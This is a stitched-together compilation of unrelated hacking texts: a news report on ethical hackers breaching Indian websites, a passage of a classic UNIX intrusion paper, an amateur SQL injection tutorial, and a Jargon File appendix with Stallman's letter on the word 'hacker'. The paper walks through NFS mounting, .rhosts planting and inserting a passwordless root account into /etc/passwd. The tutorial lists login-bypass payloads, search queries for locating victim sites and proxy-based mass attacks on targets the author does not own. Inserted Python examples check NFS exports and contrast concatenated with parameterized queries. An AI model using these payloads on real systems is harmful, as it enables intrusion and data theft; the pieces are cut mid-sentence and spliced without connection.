Jaago Re and Pizza Hut Hacked by A group of ethical hackers


How many times have you registered on a website and, to keep things simple, entered the same password you use for your email ID? Here’s a warning: every time you do that, you become vulnerable to hackers who, by breaking into the security systems of websites, gain access to all your personal emails and sensitive information such as photos, account numbers, bank passwords etc.
A two-year-old registered group of ethical hackers, who run a nonprofit organisation called Information Security Awareness Community Movement (ISACM), have discovered that some of the most frequented websites in the country — Jaago Re, IIT Bombay, Pizza Hut and Mumbai University — have very poor security systems. Last week, they managed to procure email IDs and passwords of eight lakh users from two sites alone.

In the case of jaagore.com, which conducted an intensive campaign before the Lok Sabha polls, ISACM officials said they were able to get email IDs and passwords of 6.4 lakh registered users, including some prominent people in the country.
P G Krishnamurthy, ISACM’s principal consultant, said that on this site, sensitive information such as people’s electoral numbers is also accessible to anyone who wants to misuse it.
Krishnamurthy explained that the first time they found vulnerabilities in jaagore.com earlier this year, they were immediately able to see the chinks in the armour. Once the group alerted the site owners, passwords were encrypted but the overall security was still low.
Once again on September 2, they compromised the site and were able to access mail IDs and passwords with only a little more effort than earlier. “We have once again notified the owners that they need to upgrade the security,” said Krishnamurthy.

With Pizza Hut, the hackers were able to access data of 1.7 lakh registered users. They claim that it is possible to take complete control of the site. With IIT Bombay and Mumbai University, the story is not very different.

   “In the case of Mumbai University, we could simply tinker with the information. Even the results section was open to us. As for IIT Bombay, we had complete control of the website,” said Krishnamurthy.

Krishnamurthy said, “As ethical hackers, our objective is not to misuse any information but merely test the security of the sites. Once we find a vulnerable website, we let the owners and concerned cyber cell authorities know that security can easily be breached.” The group even volunteers to help the owners fix the problems free of cost.

“Our goal is to warn Indian site owners that it is about time they take security seriously,” he added. ISACM has written to the owners of the four sites warning them of the security problems. “We haven’t heard from anyone yet. However, we are sure the owners will act on our information,” he said.

Tata Tea, owners of jaagore.com, accepted that their site had been vulnerable earlier. “The current security levels of jaagore.com are on par with international standards for a website of its nature. The company is confident that the current security levels of jaagore.com will not allow any form of unauthorised access and is sufficient to safeguard the interests of the website and also the privacy of all its registered users,” stated an emailed statement issued by Tata Tea.

Initially, Professor Abhay Karandikar, head of computer centre at IIT Bombay, denied that the site had been hacked. “My proxy logs do not see any breach at all. I keep receiving fake threats and send them to the cyber crime cell for action,” he said. However, he later added that he would get in touch with ISACM to ascertain whether they had managed to breach the site and how they had done it.

Pizza Hut officials too denied that their site had been compromised. “Pizza Hut deploys the highest standards of IT security across its systems, especially where customer data is concerned. This matter has been recently brought to our notice and we have found no signs of any breach. However, as a responsible company we are checking our security systems again and will take appropriate action if warranted,” said a spokesperson of Pizza Hut.

Mumbai University too stated that it would take all the necessary steps to secure the site. “Thanks a lot for cautioning us. The university will take immediate steps to avoid any further damage,” said K Venkatramani, registrar of Mumbai University.

Seventy per cent of Internet users use passwords of their email IDs while registering on various websites. By getting into one email inbox, hackers can gain access to the entire virtual life of an individual and other IDs as well.












Source: Pune Mirror

Improving the Security of Your Site by Breaking Into it

Introduction



Every day, all over the world, computer networks and hosts are being broken into. The level of sophistication of these attacks varies widely; while it is generally believed that most break-ins succeed due to weak passwords, there are still a large number of intrusions that use more advanced techniques to break in. Less is known about the latter types of break-ins, because by their very nature they are much harder to

CERT. SRI. The Nic. NCSC. RSA. NASA. MIT. Uunet. Berkeley. Purdue. Sun. You name it, we’ve seen it broken into. Anything that is on the Internet (and many that isn’t) seems to be fairly easy game. Are these targets unusual? What happened?

Fade to…

A young boy, with greasy blonde hair, sitting in a dark room. The room is illuminated only by the luminescence of the C64’s 40 character screen. Taking another long drag from his Benson and Hedges cigarette, the weary system cracker telnets to the next faceless “.mil” site on his hit list. “guest — guest”, “root — root”, and “system — manager” all fail. No matter. He has all night… he pencils the host off of his list, and tiredly types in the next potential victim…

This seems to be the popular image of a system cracker. Young, inexperienced, and possessing vast quantities of time to waste, to get into just one more system. However, there is a far more dangerous type of system cracker out there. One who knows the ins and outs of the latest security auditing and cracking tools, who can modify them for specific attacks, and who can write his/her own programs. One who not only reads about the latest security holes, but also personally discovers bugs and vulnerabilities. A deadly creature that can both strike poisonously and hide its tracks without a whisper or hint of a trail. The uebercracker is here.


Why “uebercracker”? The idea is stolen, obviously, from Nietzsche’s uebermensch, or, literally translated into English, “over man.” Nietzsche used the term not to refer to a comic book superman, but instead a man who had gone beyond the incompetence, pettiness, and weakness of the everyday man. The uebercracker is therefore the system cracker who has gone beyond simple cookbook methods of breaking into systems. An uebercracker is not usually motivated to perform random acts of violence. Targets are not arbitrary — there is a purpose, whether it be personal monetary gain, a hit and run raid for information, or a challenge to strike a major or prestigious site or net.personality. An uebercracker is hard to detect, harder to stop, and hardest to keep out of your site for good.



In this paper we will take an unusual approach to system security. Instead of merely saying that something is a problem, we will look through the eyes of a potential intruder, and show _why_ it is one. We will illustrate that even seemingly harmless network services can become valuable tools in the search for weak points of a system, even when these services are operating exactly as they are intended to.

In an effort to shed some light on how more advanced intrusions occur, this paper outlines various mechanisms that crackers have actually used to obtain access to systems and, in addition, some techniques we either suspect intruders of using, or that we have used ourselves in tests or in friendly/authorized environments.

Our motivation for writing this paper is that system administrators are often unaware of the dangers presented by anything beyond the most trivial attacks. While it is widely known that the proper level of protection depends on what has to be protected, many sites appear to lack the resources to assess what level of host and network security is adequate. By showing what intruders can do to gain access to a remote site, we are trying to help system administrators to make _informed_ decisions on how to secure their site — or not. We will limit the discussion to techniques that can give a remote intruder access to a (possibly non-interactive) shell process on a UNIX host. Once this is achieved, the details of obtaining root privilege are beyond the scope of this work — we consider them too site-dependent and, in many cases, too trivial to merit much discussion.

We want to stress that we will not merely run down a list of bugs or security holes — there will always be new ones for a potential attacker to exploit. The purpose of this paper is to try to get the reader to look at her or his system in a new way — one that will hopefully afford him or her the opportunity to _understand_ how their system can be compromised, and how.

We would also like to reiterate to the reader that the purpose of this paper is to show you how to test the security of your own site, not how to break into other people’s systems. The intrusion techniques we illustrate here will often leave traces in your system auditing logs — it might be constructive to examine them after trying some of these attacks out, to see what a real attack might look like. Certainly other sites and system administrators will take a very dim view of your activities if you decide to use their hosts for security testing without advance authorization; indeed, it is quite possible that legal action may be pursued against you if they perceive it as an attack.

There are four main parts to the paper. The first part is the introduction and overview. The second part attempts to give the reader a feel for what it is like to be an intruder and how to go from knowing nothing about a system to compromising its security. This section goes over actual techniques to gain information and entrance and covers basic strategies such as exploiting trust and abusing improperly configured basic network services (ftp, mail, tftp, etc.) It also discusses slightly more advanced topics, such as NIS and NFS, as well as various common bugs and configuration problems that are somewhat more OS or system specific. Defensive strategies against each of the various attacks are also covered here.

The third section deals with trust: how the security of one system depends on the integrity of other systems. Trust is the most complex subject in this paper, and for the sake of brevity we will limit the discussion to clients in disguise.

The fourth section covers the basic steps that a system administrator may take to protect her or his system. Most of the methods presented here are merely common sense, but they are often ignored in practice — one of our goals is to show just how dangerous it can be to ignore basic security practices.

Case studies, pointers to security-related information, and software are described in the appendices at the end of the paper.

While exploring the methods and strategies discussed in this paper we wrote SATAN (Security Analysis Tool for Auditing Networks.) Written in shell, perl, expect and C, it examines a remote host or set of hosts and gathers as much information as possible by remotely probing NIS, finger, NFS, ftp and tftp, rexd, and other services. This information includes the presence of various network information services as well as potential security flaws — usually in the form of incorrectly setup or configured network services, well-known bugs in system or network utilities, or poor or ignorant policy decisions. It then can either report on this data or use an expert system to further investigate any potential security problems. While SATAN doesn’t use all of the methods that we discuss in the paper, it has succeeded with ominous regularity in finding serious holes in the security of Internet sites. It will be posted and made available via anonymous ftp when completed; Appendix A covers its salient features.

Note that it isn’t possible to cover all possible methods of breaking into systems in a single paper. Indeed, we won’t cover two of the most effective methods of breaking into hosts: social engineering and password cracking. The latter method is so effective, however, that several of the strategies presented here are geared towards acquiring password files. In addition, while windowing systems (X, OpenWindows, etc.) can provide a fertile ground for exploitation, we simply don’t know many methods that are used to break into remote systems. Many system crackers use non-bitmapped terminals which can prevent them from using some of the more interesting methods to exploit windowing systems effectively (although being able to monitor the victim’s keyboard is often sufficient to capture passwords). Finally, while worms, viruses, trojan horses, and other malware are very interesting, they are not common (on UNIX systems) and probably will use similar techniques to the ones we describe in this paper as individual parts to their attack


Gaining Information


Let us assume that you are the head system administrator of Victim Incorporated’s network of UNIX workstations. In an effort to secure your machines, you ask a friendly system administrator from a nearby site (evil.com) to give you an account on one of her machines so that you can look at your own system’s security from the outside.

What should you do? First, try to gather information about your (target) host. There is a wealth of network services to look at: finger, showmount, and rpcinfo are good starting points. But don’t stop there — you should also utilize DNS, whois, sendmail (smtp), ftp, uucp, and as many other services as you can find. There are so many methods and techniques that space precludes us from showing all of them, but we will try to show a cross-section of the most common and/or dangerous strategies that we have seen or have thought of. Ideally, you would gather such information about all hosts on the subnet or area of attack — information is power — but for now we’ll examine only our intended


To start out, you look at what the ubiquitous finger command shows you (assume it is 6pm, Nov 6, 1993):

    victim % finger @victim.com
    Login   Name        TTY  Idle  When       Where
    zen     Dr. Fubar   co   1d    Wed 08:00  death.com

Good! A single idle user — it is likely that no one will notice if you actually manage to break in.

Now you try more tactics. As every finger devotee knows, fingering “@”, “0”, and “”, as well as common names, such as root, bin, ftp, system, guest, demo, manager, etc., can reveal interesting information. What that information is depends on the version of finger that your target is running, but the most notable are account names, along with their home directories and the host that they last logged in from.

To add to this information, you can use rusers (in particular with the -l flag) to get useful information on logged-in users.

Trying these commands on victim.com reveals the following information, presented in a compressed tabular form to save space:

    Login   Home-dir     Shell      Last login, from where
    -----   --------     -----      ----------------------
    root    /            /bin/sh    Fri Nov 5 07:42 on ttyp1 from big.victim.com
    bin     /bin                    Never logged in
    nobody  /                       Tue Jun 15 08:57 on ttyp2 from server.victim.co
    daemon  /                       Tue Mar 23 12:14 on ttyp0 from big.victim.com
    sync    /            /bin/sync  Tue Mar 23 12:14 on ttyp0 from big.victim.com
    zen     /home/zen    /bin/bash  On since Wed Nov 6 on ttyp3 from death.com
    sam     /home/sam    /bin/csh   Wed Nov 5 05:33 on ttyp3 from evil.com
    guest   /export/foo  /bin/sh    Never logged in
    ftp     /home/ftp               Never logged in

Both our experiments with SATAN and watching system crackers at work have proved to us that finger is one of the most dangerous services, because it is so useful for investigating a potential target. However, much of this information is useful only when used in conjunction with other data.

For instance, running showmount on your target reveals:

    evil % showmount -e victim.com
    export list for victim.com:
    /export                             (everyone)
    /var                                (everyone)
    /usr                                easy
    /export/exec/kvm/sun4c.sunos.4.1.3  easy
    /export/root/easy                   easy
    /export/swap/easy                   easy

Note that /export/foo is exported to the world; also note that this is user guest’s home directory. Time for your first break-in! In this case, you’ll mount the home directory of user “guest.” Since you don’t have a corresponding account on the local machine and since root cannot modify files on an NFS mounted filesystem, you create a “guest” account in your local password file. As user guest you can put an .rhosts entry in the remote guest home directory, which will allow you to login to the target machine without having to supply a password.

    evil # mount victim.com:/export/foo /foo
    evil # cd /foo
    evil # ls -lag
    total 3
       1 drwxr-xr-x 11 root     daemon        512 Jun 19 09:47 .
       1 drwxr-xr-x  7 root     wheel         512 Jul 19  1991 ..
       1 drwx--x--x  9 10001    daemon       1024 Aug  3 15:49 guest
    evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd
    evil # ls -lag
    total 3
       1 drwxr-xr-x 11 root     daemon        512 Jun 19 09:47 .
       1 drwxr-xr-x  7 root     wheel         512 Jul 19  1991 ..
       1 drwx--x--x  9 guest    daemon       1024 Aug  3 15:49 guest
    evil # su guest
    evil % echo evil.com >> guest/.rhosts
    evil % rlogin victim.com
    Welcome to victim.com!
    victim %

If, instead of home directories, victim.com were exporting filesystems with user commands (say, /usr or /usr/local/bin), you could replace a command with a trojan horse that executes any command of your choice. The next user to execute that command would execute your program.

We suggest that filesystems be exported:

o Read/write only to specific, trusted clients.

o Read-only, where possible (data or programs can often be exported in this manner.)
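
A defender-side check for the exposure shown above, as an added example (not from the original paper): it parses `showmount -e` output and reports exports open to every host and any account whose home directory sits inside one. The sample listing and home-directory map are constructed from the output quoted above; treating `*` or an empty client field as world-exported is an assumption.

```python
from dataclasses import dataclass

# Constructed input: the `showmount -e` listing quoted in the text above.
SHOWMOUNT_OUTPUT = """\
export list for victim.com:
/export                             (everyone)
/var                                (everyone)
/usr                                easy
/export/exec/kvm/sun4c.sunos.4.1.3  easy
/export/root/easy                   easy
/export/swap/easy                   easy
"""

# Constructed input: login -> home directory, taken from the finger/rusers table.
HOME_DIRS = {
    "root": "/", "bin": "/bin", "nobody": "/", "daemon": "/", "sync": "/",
    "zen": "/home/zen", "sam": "/home/sam", "guest": "/export/foo",
    "ftp": "/home/ftp",
}

# "(everyone)" is what the listing above prints. "*" is an assumption about
# how other showmount versions render an unrestricted export.
WORLD_MARKERS = {"(everyone)", "*"}


@dataclass(frozen=True)
class Export:
    path: str
    clients: tuple

    @property
    def world(self) -> bool:
        # Assumption: an export with no client list at all is also unrestricted.
        return not self.clients or any(c in WORLD_MARKERS for c in self.clients)


def parse_showmount(text: str) -> list:
    """Turn `showmount -e` output into Export records, skipping the header."""
    exports = []
    for line in text.splitlines():
        fields = line.strip().split(None, 1)
        if not fields or not fields[0].startswith("/"):
            continue  # header line ("export list for ...") or blank
        rest = fields[1] if len(fields) > 1 else ""
        clients = tuple(rest.replace(",", " ").split())
        exports.append(Export(fields[0], clients))
    return exports


def is_under(path: str, root: str) -> bool:
    """True if `path` equals `root` or lies below it (component-wise)."""
    root = root.rstrip("/")
    return path == (root or "/") or path.startswith(root + "/")


def exposed_homes(exports: list, homes: dict) -> dict:
    """Map each account to the world export that contains its home directory.

    Any host that can mount such an export can write a .rhosts file there.
    Caveat: NFS serves one filesystem per export, so a home on a separate
    filesystem mounted below the export point is not reachable this way.
    """
    findings = {}
    for user, home in homes.items():
        hits = [e.path for e in exports if e.world and is_under(home, e.path)]
        if hits:
            findings[user] = max(hits, key=len)  # most specific export
    return findings


if __name__ == "__main__":
    parsed = parse_showmount(SHOWMOUNT_OUTPUT)
    for e in parsed:
        if e.world:
            print(f"WORLD EXPORT  {e.path}")
    for user, export in exposed_homes(parsed, HOME_DIRS).items():
        print(f"HOME EXPOSED  {user}: {HOME_DIRS[user]} (inside {export})")
```
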

If the target has a “+” wildcard in its /etc/hosts.equiv (the default in various vendor’s machines) or has the netgroups bug (CERT advisory 91:12), any non-root user with a login name in the target’s password file can rlogin to the target without a password. And since the user “bin” often owns key files and directories, your next attack is to try to log in to the target host and modify the password file to let you have root access:

    evil % whoami
    evil % rsh victim.com csh -i
    Warning: no access to tty; thus no job control in this shell…
    victim % ls -ldg /etc
    drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc
    victim % cd /etc
    victim % mv passwd pw.old
    victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd
    victim % ^D
    evil % rlogin victim.com -l toor
    Welcome to victim.com!
    victim #

A few notes about the method used above; “rsh victim.com

SQL injection Basic Tutorial


One of the major problems with SQL is the poor security surrounding login and URL strings.
this tutorial is not going to go into detail on why these strings work



with these two search strings you will have plenty of targets to choose from…finding one that's vulnerable is another question


first let me go into details on how i go about my research

i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs…legally cool…provided by my good friend Gsecur aka ICE..also an Astal member.. http://governmentsecurity.org “thanks mate” .. gives me a chance to concentrate on what am doing and not be looking over my shoulder


this is the easiest part…very simple

on the login page just enter something like

user:admin (you dont even have to put this.)
pass:' or 1=1--


user:' or 1=1--
admin:' or 1=1--

some sites will have just a password so

password:' or 1=1--

in fact i have compiled a combo list with strings like this to use on my chosen targets ….there are plenty of strings about, the list below is a sample of the most commonly used

there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths…but thats another paper

the one am interested in are quick access to targets


i tried several programs to use with these search strings and up to now only Ares has performed well with quite a bit
of success with a combo list formatted this way, yesterday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go through 40 sites cutting and pasting each string ??

combo example:

admin:' or a=a--
admin:' or 1=1--

and so on…it dont have to be admin can be anything you want… the most important part is example:' or 1=1-- this is our injection

now the only trudge part is finding targets to exploit…so i tend to search say google for login.asp or whatever

index of:/admin/login.asp

like this: index of login.asp



17,000 possible targets trying various searches spews out plenty more

now using proxies set in my browser i then click through interesting targets…seeing whats what on the site pages if interesting
i then cut and paste url as a possible target…after an hour or so you have a list of sites of potential targets like so


and so on…in a couple of hours you can build up quite a list…reason i dont select all results or spider for login pages is
i want to keep the noise level low…my ISP.. well enough said…plus atm am on dial-up so too slow for me

i then save the list fire up Ares and enter (1) a proxy list (2) my target IP list (3) my combo list…start..now i dont want to go into
problems with users using Ares..thing is i know it works for me…

sit back and wait…any target vulnerable will show up in the hits box…now when it finds a target it will spew all the strings on that site as vulnerable…you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site …really i need a program that will return the hit with a click on url and ignore false outputs

am still looking….thing is it saves quite a bit of time going to each site and each string to find its not exploitable.

there you go you should have access to your vulnerable target by now

another thing you can use the strings in the urls where user=? edit the url to the = part and paste ' or 1=1-- so it becomes

user=' or 1=1-- just as quick as login process



' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

happy hunting


WARNING: the information provided is for educational purposes only and not to be used for malicious use. i hold no responsibility
for your actions…do the right thing and let admins know ay
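
Why the `' or 1=1--` string from the login examples above gets past a query built by string concatenation, and how a parameterized query with a salted password hash rejects it; this is an added example, not code from the original tutorial. The table names, function names and sample account are assumptions, and SQLite stands in for the site's database.

```python
import hashlib
import hmac
import os
import sqlite3

INJECTION = "' or 1=1--"                  # string quoted in the tutorial above
SAMPLE_PASSWORD = "s3cret-Constructed"    # constructed sample credential


def derive_key(password: str, salt: bytes) -> bytes:
    """Salted, slow password hash (PBKDF2-HMAC-SHA256)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_db() -> sqlite3.Connection:
    """In-memory database holding one constructed account, stored both ways."""
    db = sqlite3.connect(":memory:")
    # Legacy layout: plaintext password, compared inside the SQL statement.
    db.execute("CREATE TABLE users_legacy (username TEXT, password TEXT)")
    db.execute("INSERT INTO users_legacy VALUES (?, ?)",
               ("admin", SAMPLE_PASSWORD))
    # Hardened layout: per-user salt and derived key, compared in the app.
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY,"
               " salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO users VALUES (?, ?, ?)",
               ("admin", salt, derive_key(SAMPLE_PASSWORD, salt)))
    return db


def login_concatenated(db, username: str, password: str) -> bool:
    """VULNERABLE on purpose: form input becomes part of the SQL text.

    With password = ' or 1=1-- the statement turns into
      ... WHERE username = 'admin' AND password = '' or 1=1--'
    The quote closes the literal, `or 1=1` is true for every row, and
    `--` comments out the trailing quote, so a row always comes back.
    """
    sql = ("SELECT username FROM users_legacy WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None


def login_parameterized(db, username: str, password: str) -> bool:
    """Hardened: input is bound as data and can never change the query."""
    row = db.execute("SELECT salt, pw_hash FROM users WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        derive_key(password, b"\x00" * 16)  # keep timing similar for unknown users
        return False
    salt, pw_hash = row
    return hmac.compare_digest(derive_key(password, salt), pw_hash)


if __name__ == "__main__":
    db = make_db()
    attempts = [("admin", SAMPLE_PASSWORD), ("admin", INJECTION),
                (INJECTION, "anything")]
    for user, pw in attempts:
        print(f"user={user!r} pass={pw!r}: "
              f"concatenated={login_concatenated(db, user, pw)} "
              f"parameterized={login_parameterized(db, user, pw)}")
```
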


Helping Hacker Culture Grow


If you enjoyed the Jargon File, please help the culture that created it grow and flourish. Here are several ways you can help:

* If you are a writer or journalist, don’t say or write hacker when you mean cracker. If you work with writers or journalists, educate them on this issue and push them to do the right thing. If you catch a newspaper or magazine abusing the word `hacker’, write them and straighten them out (this appendix includes a model letter).

* If you’re a techie or computer hobbyist, get involved with one of the free Unixes. Toss out that lame Microsoft OS, or confine it to one disk partition and put Linux or FreeBSD or NetBSD on the other one. And the next time your friend or boss is thinking about some commercial software `solution’ that costs more than it’s worth, be ready to blow the competition away with free software running over a free Unix.

* Contribute to organizations like the Free Software Foundation that promote the production of high-quality free software. You can reach the Free Software Foundation at [email protected], by phone at +1-617-542-5942, or by snail-mail at 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.

* Support the League for Programming Freedom, which opposes over-broad software patents that constantly threaten to blow up in hackers’ faces, preventing them from developing innovative software for tomorrow’s needs. You can reach the League for Programming Freedom at [email protected], by phone at +1 617 621 7084, or by snail-mail at 1 Kendall Square #143, P.O.Box 9171, Cambridge, Massachusetts 02139 USA.

* If you do nothing else, please help fight government attempts to seize political control of Internet content and restrict strong cryptography. As TNHD III went to press, the so-called `Communications Decency Act’ had just been declared “unconstitutional on its face” by a Federal court, but the government is expected to appeal. If it’s still law when you read this, please join the effort by the Citizens’ Internet Empowerment Coalition lawsuit to have the CDA quashed or repealed. Surf to the Center for Democracy and Technology’s home page at http://www.cdt.org to see what you can do to help fight censorship of the net.

Here’s the text of a letter RMS wrote to the Wall Street Journal to complain about their policy of using “hacker” only in a pejorative sense. We hear that most major newspapers have the same policy. If you’d like to help change this situation, send your favorite newspaper the same letter — or, better yet, write your own letter.

Dear Editor:

This letter is not meant for publication, although you can publish it if you wish. It is meant specifically for you, the editor, not the public.

I am a hacker. That is to say, I enjoy playing with computers — working with, learning about, and writing clever computer programs. I am not a cracker; I don’t make a practice of breaking computer security.

There’s nothing shameful about the hacking I do. But when I tell people I am a hacker, people think I’m admitting something naughty — because newspapers such as yours misuse the word “hacker”, giving the impression that it means “security breaker” and nothing else. You are giving hackers a bad name.

The saddest thing is that this problem is perpetuated deliberately. Your reporters know the difference between “hacker” and “security breaker”. They know how to make the distinction, but you don’t let them! You insist on using “hacker” pejoratively. When reporters try to use another word, you change it. When reporters try to explain the other meanings, you cut it.

Of course, you have a reason. You say that readers have become used to your insulting usage of “hacker”, so that you cannot change it now. Well, you can’t undo past mistakes today; but that is no excuse to repeat them tomorrow.

If I were what you call a “hacker”, at this point I would threaten to crack your computer and crash it. But I am a hacker, not a cracker. I don’t do that kind of thing! I have enough computers to play with at home and at work; I don’t need yours. Besides, it’s not my way to respond to insults with violence. My response is this letter.

You owe hackers an apology; but more than that, you owe us ordinary respect.

Sincerely, etc.
